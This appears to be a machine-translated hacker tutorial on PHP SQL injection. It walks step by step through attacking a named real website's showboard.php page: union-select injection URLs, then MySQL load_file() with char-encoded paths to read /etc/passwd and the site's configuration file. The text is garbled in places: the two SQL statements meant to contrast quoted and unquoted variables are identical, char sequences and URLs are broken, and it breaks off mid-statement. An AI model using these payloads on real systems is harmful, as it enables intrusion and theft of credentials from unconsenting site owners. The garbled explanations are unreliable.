Php INJECTION SKILLS

First of all, I would like to thank the legion for providing me with such a good environment that I can write some original articles by myself.

Cause:
I was told that CASI had exceeded 2.0, and promised to give a vulnerability address. I just tested it if I had nothing to do. Recently, I was very depressed and couldn't continue learning, today, I promised to bring up a wonderful time for me to study php and see if I can make such a website.

Process:
The promised address is http://www.gametea.com//showboard.php? Id = 282
Very standard php injection form. We also inject according to the standard php injection method. First, we will add another method,

Http://www.gametea.com/showboard.php? Id = 282

1

He told us two pieces of information: magic_quotes_gpc = off.
The second is the web path/home/newgt/showboard. php.

Before submitting a statement, Let's explain the principles of php injection and a small example. php injection is caused by insufficient variable filtering.

Let's look at the following two SQL statements:

① SELECT * FROM article WHERE articleid = $ id ② SELECT * FROM article WHERE articleid = $ id

The two writing methods are common in various programs, but the security is different. The first sentence is to put the variable $ id in a pair of single quotes, so that all the variables we submit become strings, even if a correct SQL statement is included, the statement will not be executed normally, but the second sentence is different. Because the variable is not put into single quotes, everything we submit, as long as it contains spaces, the space-based variables are executed as SQL statements. We submit two malformed statements for the two sentences to see the difference.

① Specify the variable $ id: 1 and 1 = 2 union select * from user where userid = 1 /* The entire SQL statement becomes: SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1 /* ② Specify the variable $ id: 1 and 1 = 2 union select * from user where userid = 1 The entire SQL statement becomes: SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1

See it? Since the first sentence contains single quotes, we must first close the single quotes in front of it so that the following statements can be executed as SQL statements, and comment out the single quotes following the original SQL statement, in this way, the injection can be successful, if php. in ini, when magic_quotes_gpc is set to on or the addslashes () function is used before the variable, our attack will be invisible, but the second sentence does not contain variables with quotation marks, so we don't have to consider closing or commenting, but simply submit it.

Okay. Now we have to follow the angel method to submit the statement http://www.gametea.com/showboard.php? Id = 282% 20and % 201 = 2% 20 union % 20 select % 2050,9

2

Here we can know that the two parts 7 and 9 are text, that is, they can display the content of the file we want, now we want to read the files on the server. We can see from the web path that this machine should be UNIX, so our goal is to get the/etc/passwd file.

We know that various built-in MySQL functions can be used in SQL statements. DATABASE (), USER (), SYSTEM_USER (), SESSION_USER (), and CURRENT_USER () are frequently used () these functions are used to obtain some system information. Another function that has been widely used is load_file (). The function is used to read files and return the file content as a string.
Here, we can think of what we can do, that is, read some confidential files, but there are also restrictions:

• The file to be read must be on the server.
• The complete file path must be specified.
• You must have the permission to read and the file must be fully readable.
• The file to be read must be smaller than max_allowed_packet

If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. What is more difficult to meet is the permission. In windows, if NTFS is properly set, the relevant files cannot be read. When the file is accessible only by administrators, users should not consider load_file.

In actual injection, we have two difficulties to solve:

• Absolute physical path
• Construct valid malformed statements

In many PHP programs, when an incorrect Query is submitted, if displayhtml # "target = _ blank> _ errors = on, the program exposes the absolute path of the WEB directory, as long as you know the path, the security of the entire server will be seriously threatened for a PHP program that can be injected. Constructor statements are meaningless.

We use the load_file (char () function here. We need to convert/etc/passwd to hexadecimal. We need to use asc2chr to help us complete the conversion.

3.

We can easily get the hexadecimal format of/etc/passwd.

The following is the build statement of the _ file (char (47,101,116, 115,115,119,100,), 6, 5, 4, 3, 2, 1 "> http://www.gametea.com/showboard.php? Id = 282% 20and % 201 = 2% 20 union % 20 select % 2050,9, 8, load_file (char (47,101,116, 115,115,119,100 ,),

You can easily get the/etc/passwd file,

4

Next, we need to find a way to read the config configuration file, because we have obtained the web path, so reading is very easy.

Build statement _ file (char (47,104,111,109,101, 47,110,101,119,103,116, 47,115,104,111,119, 98,111, 97,114,100, 46,112,104,112), 6, 5, 4, 3, 2, 1 "> http://www.gametea.com//showboard.php? Id = 282% 20and % 201 = 2% 20 union % 20 select % 2050,9, 8, load_file (char (47,104,111,109,101, 4